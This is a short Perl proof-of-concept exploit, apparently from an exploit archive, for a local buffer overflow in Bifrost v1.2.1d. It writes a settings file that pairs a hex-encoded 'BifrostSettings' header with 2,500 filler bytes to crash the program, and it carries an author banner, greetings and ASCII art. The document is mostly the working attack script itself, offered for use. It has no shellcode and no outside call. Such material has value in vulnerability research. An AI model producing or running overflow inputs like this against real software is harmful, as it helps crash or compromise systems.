|
#!/usr/bin/perl ######################################################### # Title : This PoC For Local buffer Bifrost v1.2.1d.exe # Author : Or4nG.M4n # Home : cc.7rs.org | tryag.cc | v4-team.com # Email : priv8te@hotmail.com # Date : n\a # Tested on : indows XP SP3 Professional Edition ######################################################### # My Blog : or4ng3m4n.blogspot.com & 1337r1z.wordpress.com # Thks to : Dev!L FuCkEr , xsS mAn , sA^Dev!L , SarBoT511 # Greetz : i-Hmx , Fox , Z1d , Lagripe-dz , 7rs.org Member print q( anti.virus.team | Or4 _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | in the name of /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ); $x = "\x41" x 2500; $header = "\x42\x69\x66\x72\x6F\x73\x74\x53\x65\x74\x74\x69\x6E\x67\x73\x00\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31"; open(File, '>>test.set'); print File $header.$x; close(File);
# For : [Lammer Bifrost] kidz ..
|
|
|